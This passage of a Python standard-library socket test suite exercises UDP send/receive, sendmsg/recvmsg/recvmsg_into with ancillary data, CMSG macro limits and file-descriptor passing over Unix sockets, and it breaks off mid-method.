        ThreadedUDPSocketTest.__init__(self, methodName=methodName)

    def testSendtoAndRecv(self):
        # Testing sendto() and Recv() over UDP
        msg = self.serv.recv(len(MSG))
        self.assertEqual(msg, MSG)

    def _testSendtoAndRecv(self):
        self.cli.sendto(MSG, 0, (HOST, self.port))

    def testRecvFrom(self):
        # Testing recvfrom() over UDP
        msg, addr = self.serv.recvfrom(len(MSG))
        self.assertEqual(msg, MSG)

    def _testRecvFrom(self):
        self.cli.sendto(MSG, 0, (HOST, self.port))

    def testRecvFromNegative(self):
        # Negative lengths passed to recvfrom should give ValueError.
        self.assertRaises(ValueError, self.serv.recvfrom, -1)

    def _testRecvFromNegative(self):
        # A datagram is still sent so the server side is not left waiting.
        self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
    # Base class for sendmsg()/recvmsg() tests.

    # Time in seconds to wait before considering a test failed, or
    # None for no timeout.  Not all tests actually set a timeout.
    fail_timeout = 3.0

    def setUp(self):
        # Event used by subclasses to coordinate the two test threads.
        self.misc_event = threading.Event()
        super().setUp()

    def sendToServer(self, msg):
        # Send msg to the server.
        return self.cli_sock.send(msg)

    # Tuple of alternative default arguments for sendmsg() when called
    # via sendmsgToServer() (e.g. to include a destination address).
    sendmsg_to_server_defaults = ()

    def sendmsgToServer(self, *args):
        # Call sendmsg() on self.cli_sock with the given arguments,
        # filling in any arguments which are not supplied with the
        # corresponding items of self.sendmsg_to_server_defaults, if
        # any.
        return self.cli_sock.sendmsg(
            *(args + self.sendmsg_to_server_defaults[len(args):]))

    def doRecvmsg(self, sock, bufsize, *args):
        # Call recvmsg() on sock with given arguments and return its
        # result.  Should be used for tests which can use either
        # recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
        # this method with one which emulates it using recvmsg_into(),
        # thus allowing the same test to be used for both methods.
        result = sock.recvmsg(bufsize, *args)
        self.registerRecvmsgResult(result)
        return result

    def registerRecvmsgResult(self, result):
        # Called by doRecvmsg() with the return value of recvmsg() or
        # recvmsg_into().  Can be overridden to arrange cleanup based
        # on the returned ancillary data, for instance.
        pass

    def checkRecvmsgAddress(self, addr1, addr2):
        # Called to compare the received address with the address of
        # the peer.
        self.assertEqual(addr1, addr2)

    # Flags that are normally unset in msg_flags
    msg_flags_common_unset = 0
    for name in ("MSG_CTRUNC", "MSG_OOB"):
        # getattr() default of 0 tolerates platforms lacking the flag.
        msg_flags_common_unset |= getattr(socket, name, 0)

    # Flags that are normally set
    msg_flags_common_set = 0

    # Flags set when a complete record has been received (e.g. MSG_EOR
    # for SCTP)
    msg_flags_eor_indicator = 0

    # Flags set when a complete record has not been received
    # (e.g. MSG_TRUNC for datagram sockets)
    msg_flags_non_eor_indicator = 0

    def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
        # Method to check the value of msg_flags returned by recvmsg[_into]().
        #
        # Checks that all bits in msg_flags_common_set attribute are
        # set in "flags" and all bits in msg_flags_common_unset are
        # unset.
        #
        # The "eor" argument specifies whether the flags should
        # indicate that a full record (or datagram) has been received.
        # If "eor" is None, no checks are done; otherwise, checks
        # that:
        #
        #  * if "eor" is true, all bits in msg_flags_eor_indicator are
        #    set and all bits in msg_flags_non_eor_indicator are unset
        #
        #  * if "eor" is false, all bits in msg_flags_non_eor_indicator
        #    are set and all bits in msg_flags_eor_indicator are unset
        #
        # If "checkset" and/or "checkunset" are supplied, they require
        # the given bits to be set or unset respectively, overriding
        # what the attributes require for those bits.
        #
        # If any bits are set in "ignore", they will not be checked,
        # regardless of the other inputs.
        #
        # Will raise Exception if the inputs require a bit to be both
        # set and unset, and it is not ignored.
        defaultset = self.msg_flags_common_set
        defaultunset = self.msg_flags_common_unset

        if eor:
            defaultset |= self.msg_flags_eor_indicator
            defaultunset |= self.msg_flags_non_eor_indicator
        elif eor is not None:
            defaultset |= self.msg_flags_non_eor_indicator
            defaultunset |= self.msg_flags_eor_indicator

        # Function arguments override defaults
        defaultset &= ~checkunset
        defaultunset &= ~checkset

        # Merge arguments with remaining defaults, and check for conflicts
        checkset |= defaultset
        checkunset |= defaultunset
        inboth = checkset & checkunset & ~ignore
        if inboth:
            raise Exception("contradictory set, unset requirements for flags "
                            "{0:#x}".format(inboth))

        # Compare with given msg_flags value
        mask = (checkset | checkunset) & ~ignore
        self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
    """Mixin that routes doRecvmsg() through recvmsg_into()."""

    def doRecvmsg(self, sock, bufsize, *args):
        # Emulate recvmsg() on top of recvmsg_into() so the generic
        # tests can exercise both entry points with identical code.
        buf = bytearray(bufsize)
        result = sock.recvmsg_into([buf], *args)
        self.registerRecvmsgResult(result)
        nbytes = result[0]
        self.assertGreaterEqual(nbytes, 0)
        self.assertLessEqual(nbytes, bufsize)
        # Rebuild the recvmsg()-style 4-tuple with the received bytes first.
        return (bytes(buf[:nbytes]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
    """msg_flags expectations specific to datagram sockets."""

    @property
    def msg_flags_non_eor_indicator(self):
        # A truncated datagram is signalled by MSG_TRUNC.
        inherited = super().msg_flags_non_eor_indicator
        return inherited | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
    """msg_flags expectations specific to SCTP sockets."""

    @property
    def msg_flags_eor_indicator(self):
        # SCTP marks the end of a complete record with MSG_EOR.
        inherited = super().msg_flags_eor_indicator
        return inherited | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
    # Base class for tests on connectionless-mode sockets.  Users must
    # supply sockets on attributes cli and serv to be mapped to
    # cli_sock and serv_sock respectively.

    @property
    def serv_sock(self):
        return self.serv

    @property
    def cli_sock(self):
        return self.cli

    @property
    def sendmsg_to_server_defaults(self):
        # Unconnected sockets need an explicit destination address as
        # the fourth sendmsg() argument.
        return ([], [], 0, self.serv_addr)

    def sendToServer(self, msg):
        # sendto() rather than send(): there is no connected peer.
        return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
    # Base class for tests on connected sockets.  Users must supply
    # sockets on attributes serv_conn and cli_conn (representing the
    # connections *to* the server and the client), to be mapped to
    # cli_sock and serv_sock respectively.

    @property
    def serv_sock(self):
        return self.cli_conn

    @property
    def cli_sock(self):
        return self.serv_conn

    def checkRecvmsgAddress(self, addr1, addr2):
        # Address is currently "unspecified" for a connected socket,
        # so we don't examine it
        pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
    # Base class to set a timeout on server's socket.

    def setUp(self):
        super().setUp()
        # Fail fast instead of hanging forever if the client never sends.
        self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
    # Tests for sendmsg() which can use any socket type and do not
    # involve recvmsg() or recvmsg_into().  testFoo() runs server-side,
    # _testFoo() runs in the client thread.

    def testSendmsg(self):
        # Send a simple message with sendmsg().
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsg(self):
        self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))

    def testSendmsgDataGenerator(self):
        # Send from buffer obtained from a generator (not a sequence).
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgDataGenerator(self):
        self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
                         len(MSG))

    def testSendmsgAncillaryGenerator(self):
        # Gather (empty) ancillary data from a generator.
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgAncillaryGenerator(self):
        self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
                         len(MSG))

    def testSendmsgArray(self):
        # Send data from an array instead of the usual bytes object.
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgArray(self):
        self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
                         len(MSG))

    def testSendmsgGather(self):
        # Send message data from more than one buffer (gather write).
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgGather(self):
        self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))

    def testSendmsgBadArgs(self):
        # Check that sendmsg() rejects invalid arguments.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    def _testSendmsgBadArgs(self):
        self.assertRaises(TypeError, self.cli_sock.sendmsg)
        self.assertRaises(TypeError, self.sendmsgToServer,
                          b"not in an iterable")
        self.assertRaises(TypeError, self.sendmsgToServer,
                          object())
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [object()])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG, object()])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], object())
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [], object())
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [], 0, object())
        # Unblock the server's recv() above.
        self.sendToServer(b"done")

    def testSendmsgBadCmsg(self):
        # Check that invalid ancillary data items are rejected.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    def _testSendmsgBadCmsg(self):
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [object()])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(object(), 0, b"data")])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, object(), b"data")])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0, object())])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0)])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0, b"data", 42)])
        self.sendToServer(b"done")

    @requireAttrs(socket, "CMSG_SPACE")
    def testSendmsgBadMultiCmsg(self):
        # Check that invalid ancillary data items are rejected when
        # more than one item is present.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    @testSendmsgBadMultiCmsg.client_skip
    def _testSendmsgBadMultiCmsg(self):
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [0, 0, b""])
        self.assertRaises(TypeError, self.sendmsgToServer,
                          [MSG], [(0, 0, b""), object()])
        self.sendToServer(b"done")

    def testSendmsgExcessCmsgReject(self):
        # Check that sendmsg() rejects excess ancillary data items
        # when the number that can be sent is limited.
        self.assertEqual(self.serv_sock.recv(1000), b"done")

    def _testSendmsgExcessCmsgReject(self):
        if not hasattr(socket, "CMSG_SPACE"):
            # Can only send one item
            with self.assertRaises(OSError) as cm:
                self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
            # errno is unspecified for this failure mode.
            self.assertIsNone(cm.exception.errno)
        self.sendToServer(b"done")

    def testSendmsgAfterClose(self):
        # Check that sendmsg() fails on a closed socket.
        pass

    def _testSendmsgAfterClose(self):
        self.cli_sock.close()
        self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
    # Tests for sendmsg() which require a stream socket and do not
    # involve recvmsg() or recvmsg_into().

    def testSendmsgExplicitNoneAddr(self):
        # Check that peer address can be specified as None.
        self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)

    def _testSendmsgExplicitNoneAddr(self):
        self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))

    def testSendmsgTimeout(self):
        # Check that timeout works with sendmsg().
        self.assertEqual(self.serv_sock.recv(512), b"a"*512)
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))

    def _testSendmsgTimeout(self):
        try:
            self.cli_sock.settimeout(0.03)
            try:
                # Keep sending until the send buffer fills and the
                # short timeout fires.
                while True:
                    self.sendmsgToServer([b"a"*512])
            except socket.timeout:
                pass
            except OSError as exc:
                if exc.errno != errno.ENOMEM:
                    raise
                # bpo-33937 the test randomly fails on Travis CI with
                # "OSError: [Errno 12] Cannot allocate memory"
            else:
                self.fail("socket.timeout not raised")
        finally:
            # Signal the server thread that the client is finished.
            self.misc_event.set()

    # XXX: would be nice to have more tests for sendmsg flags argument.

    # Linux supports MSG_DONTWAIT when sending, but in general, it
    # only works when receiving.  Could add other platforms if they
    # support it too.
    @skipWithClientIf(sys.platform not in {"linux"},
                      "MSG_DONTWAIT not known to work on this platform when "
                      "sending")
    def testSendmsgDontWait(self):
        # Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
        self.assertEqual(self.serv_sock.recv(512), b"a"*512)
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))

    @testSendmsgDontWait.client_skip
    def _testSendmsgDontWait(self):
        try:
            with self.assertRaises(OSError) as cm:
                while True:
                    self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
            # bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
            # with "OSError: [Errno 12] Cannot allocate memory"
            self.assertIn(cm.exception.errno,
                          (errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
        finally:
            self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
    # Tests for sendmsg() which require a connectionless-mode
    # (e.g. datagram) socket, and do not involve recvmsg() or
    # recvmsg_into().

    def testSendmsgNoDestAddr(self):
        # Check that sendmsg() fails when no destination address is
        # given for unconnected socket.
        pass

    def _testSendmsgNoDestAddr(self):
        # Both an omitted address and an explicit None must be rejected.
        self.assertRaises(OSError, self.cli_sock.sendmsg,
                          [MSG])
        self.assertRaises(OSError, self.cli_sock.sendmsg,
                          [MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
    # Tests for recvmsg() which can also be emulated using
    # recvmsg_into(), and can use any socket type.  All receives go
    # through self.doRecvmsg() so RecvmsgIntoMixin can redirect them.

    def testRecvmsg(self):
        # Receive a simple message with recvmsg[_into]().
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsg(self):
        self.sendToServer(MSG)

    def testRecvmsgExplicitDefaults(self):
        # Test recvmsg[_into]() with default arguments provided explicitly.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 0, 0)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgExplicitDefaults(self):
        self.sendToServer(MSG)

    def testRecvmsgShorter(self):
        # Receive a message smaller than buffer.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG) + 42)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgShorter(self):
        self.sendToServer(MSG)

    def testRecvmsgTrunc(self):
        # Receive part of message, check for truncation indicators.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG) - 3)
        self.assertEqual(msg, MSG[:-3])
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=False)

    def _testRecvmsgTrunc(self):
        self.sendToServer(MSG)

    def testRecvmsgShortAncillaryBuf(self):
        # Test ancillary data buffer too small to hold any ancillary data.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 1)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgShortAncillaryBuf(self):
        self.sendToServer(MSG)

    def testRecvmsgLongAncillaryBuf(self):
        # Test large ancillary data buffer.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 10240)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgLongAncillaryBuf(self):
        self.sendToServer(MSG)

    def testRecvmsgAfterClose(self):
        # Check that recvmsg[_into]() fails on a closed socket.
        self.serv_sock.close()
        self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)

    def _testRecvmsgAfterClose(self):
        pass

    def testRecvmsgTimeout(self):
        # Check that timeout works.
        try:
            self.serv_sock.settimeout(0.03)
            self.assertRaises(socket.timeout,
                              self.doRecvmsg, self.serv_sock, len(MSG))
        finally:
            # Release the client, which is blocked waiting on misc_event.
            self.misc_event.set()

    def _testRecvmsgTimeout(self):
        self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))

    @requireAttrs(socket, "MSG_PEEK")
    def testRecvmsgPeek(self):
        # Check that MSG_PEEK in flags enables examination of pending
        # data without consuming it.

        # Receive part of data with MSG_PEEK.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG) - 3, 0,
                                                   socket.MSG_PEEK)
        self.assertEqual(msg, MSG[:-3])
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        # Ignoring MSG_TRUNC here (so this test is the same for stream
        # and datagram sockets).  Some wording in POSIX seems to
        # suggest that it needn't be set when peeking, but that may
        # just be a slip.
        self.checkFlags(flags, eor=False,
                        ignore=getattr(socket, "MSG_TRUNC", 0))

        # Receive all data with MSG_PEEK.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                   len(MSG), 0,
                                                   socket.MSG_PEEK)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

        # Check that the same data can still be received normally.
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    @testRecvmsgPeek.client_skip
    def _testRecvmsgPeek(self):
        self.sendToServer(MSG)

    @requireAttrs(socket.socket, "sendmsg")
    def testRecvmsgFromSendmsg(self):
        # Test receiving with recvmsg[_into]() when message is sent
        # using sendmsg().
        self.serv_sock.settimeout(self.fail_timeout)
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    @testRecvmsgFromSendmsg.client_skip
    def _testRecvmsgFromSendmsg(self):
        self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
    # Tests which require a stream socket and can use either recvmsg()
    # or recvmsg_into().

    def testRecvmsgEOF(self):
        # Receive end-of-stream indicator (b"", peer socket closed).
        msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
        self.assertEqual(msg, b"")
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=None) # Might not have end-of-record marker

    def _testRecvmsgEOF(self):
        self.cli_sock.close()

    def testRecvmsgOverflow(self):
        # Receive a message in more than one chunk.
        seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
                                                    len(MSG) - 3)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=False)

        seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

        # The two chunks together must reassemble the original message.
        msg = seg1 + seg2
        self.assertEqual(msg, MSG)

    def _testRecvmsgOverflow(self):
        self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
    # Tests for recvmsg() which can use any socket type.

    def testRecvmsgBadArgs(self):
        # Check that recvmsg() rejects invalid arguments.
        self.assertRaises(TypeError, self.serv_sock.recvmsg)
        self.assertRaises(ValueError, self.serv_sock.recvmsg,
                          -1, 0, 0)
        self.assertRaises(ValueError, self.serv_sock.recvmsg,
                          len(MSG), -1, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg,
                          [bytearray(10)], 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg,
                          object(), 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg,
                          len(MSG), object(), 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg,
                          len(MSG), 0, object())

        # A well-formed call must still succeed after the rejections.
        msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgBadArgs(self):
        self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
    # Tests for recvmsg_into() which can use any socket type.

    def testRecvmsgIntoBadArgs(self):
        # Check that recvmsg_into() rejects invalid arguments.
        buf = bytearray(len(MSG))
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          len(MSG), 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          buf, 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [object()], 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [b"I'm not writable"], 0, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [buf, object()], 0, 0)
        self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
                          [buf], -1, 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [buf], object(), 0)
        self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
                          [buf], 0, object())

        # A well-formed call must still succeed after the rejections.
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(buf, bytearray(MSG))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoBadArgs(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoGenerator(self):
        # Receive into buffer obtained from a generator (not a sequence).
        buf = bytearray(len(MSG))
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
            (o for o in [buf]))
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(buf, bytearray(MSG))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoGenerator(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoArray(self):
        # Receive into an array rather than the usual bytearray.
        buf = array.array("B", [0] * len(MSG))
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
        self.assertEqual(nbytes, len(MSG))
        self.assertEqual(buf.tobytes(), MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoArray(self):
        self.sendToServer(MSG)

    def testRecvmsgIntoScatter(self):
        # Receive into multiple buffers (scatter write).
        b1 = bytearray(b"----")
        b2 = bytearray(b"0123456789")
        b3 = bytearray(b"--------------")
        # The memoryview slice of b2 checks writes into a sub-buffer.
        nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
            [b1, memoryview(b2)[2:9], b3])
        self.assertEqual(nbytes, len(b"Mary had a little lamb"))
        self.assertEqual(b1, bytearray(b"Mary"))
        self.assertEqual(b2, bytearray(b"01 had a 9"))
        self.assertEqual(b3, bytearray(b"little lamb---"))
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.assertEqual(ancdata, [])
        self.checkFlags(flags, eor=True)

    def _testRecvmsgIntoScatter(self):
        self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
    """Exercise CMSG_LEN() and CMSG_SPACE().

    These checks cover assumptions used by sendmsg() and
    recvmsg[_into](), which share code with the two macros.
    """

    # Match the definition in socketmodule.c
    try:
        import _testcapi
    except ImportError:
        socklen_t_limit = 0x7fffffff
    else:
        socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)

    @requireAttrs(socket, "CMSG_LEN")
    def testCMSG_LEN(self):
        # Probe all small sizes plus a band just below the overflow limit.
        toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
        candidates = [*range(257), *range(toobig - 257, toobig)]

        # struct cmsghdr has at least three members, two of which are ints
        self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
        for size in candidates:
            length = socket.CMSG_LEN(size)
            # This is how recvmsg() calculates the data size
            self.assertEqual(length - socket.CMSG_LEN(0), size)
            self.assertLessEqual(length, self.socklen_t_limit)

        self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
        # sendmsg() shares code with these functions, and requires
        # that it reject values over the limit.
        self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
        self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)

    @requireAttrs(socket, "CMSG_SPACE")
    def testCMSG_SPACE(self):
        # Probe all small sizes plus a band just below the overflow limit.
        toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
        candidates = [*range(257), *range(toobig - 257, toobig)]

        previous = socket.CMSG_SPACE(0)
        # struct cmsghdr has at least three members, two of which are ints
        self.assertGreater(previous, array.array("i").itemsize * 2)
        for size in candidates:
            space = socket.CMSG_SPACE(size)
            # CMSG_SPACE() must be monotonic and at least as large as
            # CMSG_LEN() for the same payload size.
            self.assertGreaterEqual(space, previous)
            self.assertGreaterEqual(space, socket.CMSG_LEN(size))
            self.assertGreaterEqual(space, size + socket.CMSG_LEN(0))
            self.assertLessEqual(space, self.socklen_t_limit)
            previous = space

        self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
        # sendmsg() shares code with these functions, and requires
        # that it reject values over the limit.
        self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
        self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
    # Tests for file descriptor passing on Unix-domain sockets.
    # Each server-side test* method has a _test* client counterpart
    # that runs in the peer process/thread and sends the data.

    # Invalid file descriptor value that's unlikely to evaluate to a
    # real FD even if one of its bytes is replaced with a different
    # value (which shouldn't actually happen).
    badfd = -0x5555

    def newFDs(self, n):
        # Return a list of n file descriptors for newly-created files
        # containing their list indices as ASCII numbers.  Both the
        # files and the descriptors are cleaned up automatically.
        fds = []
        for i in range(n):
            fd, path = tempfile.mkstemp()
            self.addCleanup(os.unlink, path)
            self.addCleanup(os.close, fd)
            os.write(fd, str(i).encode())
            fds.append(fd)
        return fds

    def checkFDs(self, fds):
        # Check that the file descriptors in the given list contain
        # their correct list indices as ASCII numbers.
        for n, fd in enumerate(fds):
            os.lseek(fd, 0, os.SEEK_SET)
            self.assertEqual(os.read(fd, 1024), str(n).encode())

    def registerRecvmsgResult(self, result):
        # Ensure any FDs embedded in a recvmsg() result get closed at
        # test teardown.
        self.addCleanup(self.closeRecvmsgFDs, result)

    def closeRecvmsgFDs(self, recvmsg_result):
        # Close all file descriptors specified in the ancillary data
        # of the given return value from recvmsg() or recvmsg_into().
        for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
            if (cmsg_level == socket.SOL_SOCKET and
                    cmsg_type == socket.SCM_RIGHTS):
                fds = array.array("i")
                # Drop any trailing partial int before decoding.
                fds.frombytes(cmsg_data[:
                        len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
                for fd in fds:
                    os.close(fd)

    def createAndSendFDs(self, n):
        # Send n new file descriptors created by newFDs() to the
        # server, with the constant MSG as the non-ancillary data.
        self.assertEqual(
            self.sendmsgToServer([MSG],
                                 [(socket.SOL_SOCKET,
                                   socket.SCM_RIGHTS,
                                   array.array("i", self.newFDs(n)))]),
            len(MSG))

    def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
        # Check that constant MSG was received with numfds file
        # descriptors in a maximum of maxcmsgs control messages (which
        # must contain only complete integers).  By default, check
        # that MSG_CTRUNC is unset, but ignore any flags in
        # ignoreflags.
        msg, ancdata, flags, addr = result
        self.assertEqual(msg, MSG)
        self.checkRecvmsgAddress(addr, self.cli_addr)
        self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
                        ignore=ignoreflags)

        self.assertIsInstance(ancdata, list)
        self.assertLessEqual(len(ancdata), maxcmsgs)
        fds = array.array("i")
        for item in ancdata:
            self.assertIsInstance(item, tuple)
            cmsg_level, cmsg_type, cmsg_data = item
